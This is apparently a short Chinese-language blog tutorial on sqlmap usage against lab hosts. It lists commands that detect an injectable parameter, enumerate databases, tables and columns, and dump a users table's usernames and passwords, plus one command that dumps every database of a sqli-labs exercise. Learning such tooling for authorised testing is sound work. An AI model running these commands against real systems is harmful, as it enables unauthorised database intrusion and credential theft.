sqlmap使用

sqlmap -u 'http://172.16.12.2/get.php?id=1' 检查是否存在注入点
sqlmap -u 'http://172.16.12.2/get.php?id=1' --dbs 查看所有数据库
sqlmap -u 'http://172.16.12.2/get.php?id=1' --current-db 查看当前使用的数据库
sqlmap -u 'http://172.16.12.2/get.php?id=1' -D tips --tables 查看表名
sqlmap -u 'http://172.16.12.2/get.php?id=1' -D tips -T users --columns 列出所有字段名
sqlmap -u 'http://172.16.12.2/get.php?id=1' -D tips -T users -C id,password,username --dump 列出字段内容(数据)
sqlmap -u "http://192.168.198.128/sqli-labs-master/Less-1/?id=1" --dump 下载所有数据库

上一篇:sqlmap——json注入


下一篇:Sqlmap实战